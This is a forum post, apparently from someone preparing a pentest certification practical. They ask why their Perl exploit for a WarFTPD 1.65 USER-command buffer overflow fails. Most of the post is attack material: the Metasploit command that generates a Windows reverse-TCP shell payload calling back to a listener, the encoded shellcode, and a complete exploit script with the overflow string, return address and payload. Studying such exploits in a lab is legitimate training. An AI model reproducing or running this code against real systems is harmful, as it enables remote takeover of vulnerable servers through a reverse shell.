I was recently trying to put together an example of how you can use metasploit to generate exploit code and I ran up against an issue. Hopefully someone can tell me where I went wrong in this process.
The exploit I wanted to demo warftpd 1.65 since theres a whole lot of stuff out there already on it. Looking at the metasploit module :
exploit/windows/ftp/warftpd_165_user I find that
'BadChars' => "\x00\x0a\x0d\x40",
'Ret' => 0x71ab1d54 # for XP SP0
Now, using the msf tools, I generate the exploit code:
~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r | ./msfencode -b '\x00\x0a\x0d\x40' -t perl
[*] x86/shikata_ga_nai succeeded, final size 205
"\xbd\x69\x9e\x09\x95\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1" .
"\x2d\x58\x31\x68\x14\x83\xe8\xfc\x03\x68\x10\x8b\x6b\xf5" .
"\xff\xa0\xd3\xee\xf9\xc9\x23\x11\x99\x04\x07\x65\x27\x5a" .
"\x3c\x06\xe5\xda\x43\x18\x9e\x4d\x64\xe7\x4b\xfa\x50\x7d" .
"\x8a\x12\xa9\x41\x14\x46\x0b\x8b\x2a\x97\x4e\x88\xf5\xe2" .
"\xb8\xd2\x93\x35\x8f\xa0\xb8\x0e\x84\x04\x1b\x91\x73\xfc" .
"\xe8\x8d\xda\x8a\xa0\xb1\xdd\x65\x3d\xe5\x44\xfc\x2e\xd1" .
"\x6a\x9e\x51\xf9\xa2\xbb\xca\x72\x87\x0b\x98\xc4\x04\xe7" .
"\xee\xd8\xb9\x7c\x66\xe8\x9f\xe4\x24\x8e\x77\xda\xf8\x26" .
"\xff\x6f\xcf\xe9\xab\xe9\x96\x67\x34\x09\x3e\x12\xe7\xa6" .
"\xec\x4f\x4b\x1a\x50\x3c\xc2\x7b\x30\x43\x3b\x8b\xbf\x14" .
"\x97\xea\x06\x7d\xc8\x0c\xae\xe7\x4e\x5a\x20\x18\x66\x0c" .
"\xd7\x26\x2f\x01\xa9\xc0\x58\x77\xf5\x6a\xca\xfe\xe6\x18" .
"\xfc\x53\xbe\xba\x45\x04\x45\xbd\x60\xfb\xf1\x4d\xdd\xaf" .
"\xae\x1e\xbb\xf6\x91\x98\xbc\xef\x18";
and then I incorporate all of that into the perl exploit
#!/usr/bin/perl
use IO::Socket;
my $sock = new IO::Socket::INET (
PeerAddr => "192.168.50.128",
PeerPort =>"21",
Proto => "tcp",
);
$trash = <$sock>;
$str = "USER " . "A"x485 ."\x54\x1d\xab\x71" . "\x41"x115 ;
$str .= "\x29\xc9\xb1\x2d\xda\xc5\xb8\x0b\xe6\x4f\x25\xd9\x74\x24" .
"\xf4\x5e\x31\x46\x15\x03\x46\x15\x83\xc6\x04\xe9\x13\xb3" .
"\x4f\x06\x9c\xa4\x69\x27\xdc\xca\xea\xe6\xf8\xbe\x96\x34" .
"\x74\xbc\x55\x3c\x8b\xd2\x2d\xeb\xab\x2d\xd8\x98\x98\xb7" .
"\x1d\x70\xd1\x07\x84\x20\xd3\x42\xba\x39\x16\xd6\x05\x4c" .
"\x60\x94\xe3\x97\x46\x6e\x0f\xac\xdd\xde\xeb\x33\x0b\x86" .
"\x78\x2f\x92\xcc\x30\x53\x25\x3a\xcd\x47\xbc\x35\xbe\xb3" .
"\xa2\x24\xc0\x5b\xeb\x7d\x5a\x10\x4f\xb2\x28\x66\x5c\x39" .
"\x5e\x7a\xf1\xb6\xf7\x8a\x57\xaf\x54\xec\x0f\x1c\x69\x98" .
"\xb8\x11\xbf\x07\x13\xb0\x06\xc5\xfb\xc3\xaf\xbc\xaf\x68" .
"\x03\xed\x0c\xdc\xe0\x42\x1a\x05\x80\xe5\xf3\xc2\x4f\xb2" .
"\x58\xb5\xf6\xdb\x80\xc6\xdf\x45\x86\x91\x8f\x76\x2e\x76" .
"\x27\x48\x67\x4b\x39\x2e\x10\xbd\x65\xc8\xb3\x34\x76\x7e" .
"\x24\x14\x2e\x18\xfd\xcd\xd5\x1b\x2b\xa1\x61\xef\x84\x11" .
"\xdd\xbc\x42\x2f\x21\x7a\x74\xa9\xa8";
print $sock $str . "\r\n";
$trash = <$sock>;
print $sock "pass test \r\n";
The exploit is lauched when I run it, my listener gets a connection back, however it doesn't appear that cmd.exe is ever spawned and as soon as I send anything on the connection back the application crashes. When I do it from within metasploit it works great, so I feel comfortable that this is something that I'm doing wrong.
Thanks in advance for any insight.
General Certification : CPT Practical Submission
